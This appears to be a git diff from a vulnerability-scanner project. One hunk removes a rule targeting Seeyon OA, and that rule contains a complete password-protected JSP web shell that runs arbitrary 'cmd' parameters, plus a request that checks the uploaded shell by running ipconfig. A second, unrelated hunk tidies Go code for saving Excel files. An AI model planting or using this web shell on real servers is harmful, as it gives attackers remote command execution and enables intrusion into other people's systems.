- <%@ page language=\"java\" import=\"java.util.*,java.io.*\" pageEncoding=\"UTF-8\"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+\"\\n\");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if(\"asasd3344\".equals(request.getParameter(\"pwd\"))&&!\"\".equals(request.getParameter(\"cmd\"))){out.println(\"\"+excuteCmd(request.getParameter(\"cmd\")) + \"
\");}else{out.println(\":-)\");}%>6e4f045d4b8506bf492ada7e3390d7ce\r\n
- "
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: "/seeyon/test123456.jsp?pwd=asasd3344&cmd=ipconfig"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"Windows IP\")"
\ No newline at end of file
diff --git a/toexcel/excel.go b/toexcel/excel.go
index f1978e7..faa3792 100644
--- a/toexcel/excel.go
+++ b/toexcel/excel.go
@@ -73,14 +73,6 @@ func SaveToExcel(fileName, sheetName string, content [][]interface{}, A, B strin
return err
}
- //保存文件
- // if !strings.Contains(fileName, ".") {
- // fileName = "./output/" + fileName + ".xlsx"
- // } else if strings.Split(fileName, ".")[1] != "xlsx" {
- // fileName = "./output/" + fmt.Sprintf("%v.xlsx", strings.Split(fileName, ".")[0])
- // } else {
- // fileName = "./output/" + fileName
- // }
extension := filepath.Ext(fileName)
if extension == "" {
fileName = filepath.Join("./output", fileName+".xlsx")